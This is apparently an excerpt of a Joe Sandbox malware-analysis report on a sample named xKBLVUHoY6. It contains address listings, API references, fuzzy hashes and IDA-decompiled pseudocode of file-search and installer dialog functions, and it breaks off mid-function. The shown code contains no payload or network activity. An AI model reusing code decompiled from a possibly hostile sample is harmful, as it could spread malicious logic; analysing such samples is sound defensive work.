0x00406c4e
0x00406a82
0x00406a82
0x00406a8b
0x00407499
0x00407499
0x00000000
0x00407499
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040683D(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426758); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426758;
			}

0x00406848
0x00406851
0x00000000
0x0040685e
0x00406854
0x00000000

APIs

FindFirstFileW.KERNELBASE(770F3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,770F3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,770F3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
FindClose.KERNEL32(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406507();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040291a
0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 8b7112dacf42823d7a0a51554599ee8fcdfbe73af1dc861e8dae23c867b5cefb
Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
Opcode Fuzzy Hash: 8b7112dacf42823d7a0a51554599ee8fcdfbe73af1dc861e8dae23c867b5cefb
Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x4236f0 = _t34;
					if(_t130 == 0x110) {
						 *0x42a228 = _t127;
						 *0x423704 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216d0 = _t91;
						E00404463(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429208);
						 *0x4291ec = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x4236f0 = 1;
					}
					_t124 =  *0x40a368; // 0x2
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a240;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044AF(0x40b);
						while(1) {
							_t36 =  *0x4236f0;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x2
							__eflags = _t38 -  *0x42a244;
							if(_t38 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291ec - _t136;
							if( *0x4291ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x2
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404463(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ac - _t136;
							_v28 = _t48;
							if( *0x42a2ac != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404485(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x4216d0, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x423704);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x4216d0);
							}
							E00404498();
							E00406507(0x423708, E00403F45());
							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423708); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291f8); // executed
									 *0x4226e0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x4291f8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404463(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x4291ec - _t136;
									if( *0x4291ec != _t136) {
										goto L63;
									}
									ShowWindow( *0x4291f8, 8); // executed
									E004044AF(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x4291f8);
						 *0x42a228 = _t136;
						EndDialog(_t127,  *0x421ed8);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x4291f8, 0x40f, 0, 1);
						__eflags =  *0x4291ec;
						return 0 |  *0x4291ec == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ac - _t136;
											if( *0x42a2ac == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421ed8 = 1;
												L23:
												_push(0x78);
												L24:
												E0040443C();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421ed8 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x2
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x4291f8);
						 *0x4291f8 = _t122;
						L60:
						_t145 =  *0x425708 - _t136; // 0x1
						if(_t145 == 0 &&  *0x4291f8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425708 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E004044CA(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403f6f
0x00403f76
0x004040dd
0x004040e1
0x004040e5
0x004040e7
0x004040ec
0x004040f7
0x00404102
0x00404107
0x00404109
0x0040410b
0x0040410e
0x00404113
0x00404121
0x0040412e
0x00404135
0x00404135
0x00404136
0x00404136
0x0040413b
0x00404141
0x00404148
0x0040414e
0x00404150
0x00404190
0x00404195
0x0040419a
0x0040419a
0x0040419f
0x004041a8
0x004041aa
0x004041af
0x004041b5
0x004041b9
0x004041b9
0x004041be
0x004041c4
0x00000000
0x00000000
0x004041cf
0x004041d5
0x00000000
0x00000000
0x004041de
0x004041e6
0x004041eb
0x004041ee
0x004041f4
0x004041f9
0x004041fc
0x00404202
0x00404207
0x0040420a
0x00404210
0x00404218
0x0040421e
0x00404224
0x00404228
0x0040422f
0x0040422f
0x0040422f
0x00404239
0x0040424b
0x00404257
0x0040425c
0x00404266
0x0040426c
0x0040426e
0x00404273
0x00404270
0x00404270
0x00404270
0x00404283
0x0040429b
0x0040429d
0x004042a3
0x004042b8
0x004042a5
0x004042ae
0x004042b0
0x004042b0
0x004042be
0x004042cf
0x004042e5
0x004042ec
0x004042f6
0x004042fb
0x004042fd
0x00000000
0x00404303
0x00404303
0x00404305
0x00000000
0x00000000
0x0040430b
0x0040430f
0x00404334
0x0040433a
0x00404340
0x00404342
0x00000000
0x00000000
0x00404368
0x0040436e
0x00404370
0x00404375
0x00000000
0x00000000
0x0040437b
0x0040437e
0x00404381
0x00404398
0x004043a4
0x004043bd
0x004043c7
0x004043cc
0x004043d2
0x00000000
0x00000000
0x004043dc
0x004043e7
0x00000000
0x004043e7
0x00404311
0x00404317
0x00000000
0x00000000
0x0040431d
0x00404323
0x00000000
0x00000000
0x00000000
0x00404329
0x004042fd
0x004043f4
0x00404400
0x00404407
0x00000000
0x00404152
0x00404152
0x00404155
0x00404188
0x00404188
0x0040418a
0x00000000
0x00000000
0x00000000
0x0040418a
0x0040415b
0x00404160
0x00404162
0x00000000
0x00000000
0x00404172
0x0040417a
0x00000000
0x00404180
0x00403f88
0x00403f88
0x00403f8c
0x00403f91
0x00403fa0
0x00403fa0
0x00403fa6
0x00403fad
0x00403ff1
0x00403ff7
0x00404010
0x00404013
0x00404026
0x0040402c
0x00000000
0x00000000
0x00404032
0x0040403d
0x0040403f
0x00404041
0x00404060
0x00404060
0x00404063
0x00404068
0x0040406b
0x0040407b
0x0040407c
0x0040407e
0x004040b4
0x004040c4
0x00000000
0x004040c4
0x00404080
0x00404086
0x0040409f
0x004040a4
0x004040a6
0x00000000
0x00000000
0x004040a8
0x00404094
0x00404094
0x00404096
0x00404096
0x00000000
0x00404096
0x00404089
0x0040408e
0x00000000
0x0040408e
0x0040406d
0x00404073
0x00000000
0x00000000
0x00404075
0x00000000
0x00404075
0x00404065
0x00000000
0x00404065
0x0040404b
0x00404052
0x00404058
0x0040405a
0x00404430
0x00000000
0x00404430
0x00000000
0x0040405a
0x00404018
0x00000000
0x00404020
0x00403fff
0x00404005
0x0040440d
0x0040440d
0x00404413
0x00404420
0x00404426
0x00404426
0x00000000
0x00403faf
0x00403fb4
0x00403fc0
0x00403fc9
0x004040ca
0x00000000
0x00403fe8
0x00403feb
0x00000000
0x00403feb
0x00403fc9
0x00403fad

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
ShowWindow.USER32(?), ref: 00403FC0
GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
ShowWindow.USER32(?,00000004), ref: 00403FEB
DestroyWindow.USER32 ref: 00403FFF
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
GetDlgItem.USER32(?,?), ref: 00404037
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
IsWindowEnabled.USER32(00000000), ref: 00404052
GetDlgItem.USER32(?,00000001), ref: 004040FD
GetDlgItem.USER32(?,00000002), ref: 00404107
SetClassLongW.USER32(?,000000F2,?), ref: 00404121
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
GetDlgItem.USER32(?,00000003), ref: 00404218
ShowWindow.USER32(00000000,?), ref: 00404239
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
EnableWindow.USER32(?,?), ref: 00404266
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
EnableMenuItem.USER32(00000000), ref: 00404283
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
SetWindowTextW.USER32(?,00423708), ref: 004042EC
ShowWindow.USER32(?,0000000A), ref: 00404420

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 3c9ae7d6275b35c3fda3dee6dbafb97324a8be4c9a106d3b0ef57b82a36e873a
Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
Opcode Fuzzy Hash: 3c9ae7d6275b35c3fda3dee6dbafb97324a8be4c9a106d3b0ef57b82a36e873a
Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB6 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BB6(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a230;
				_t22 = E004068D4(2);
				_t90 = _t22;
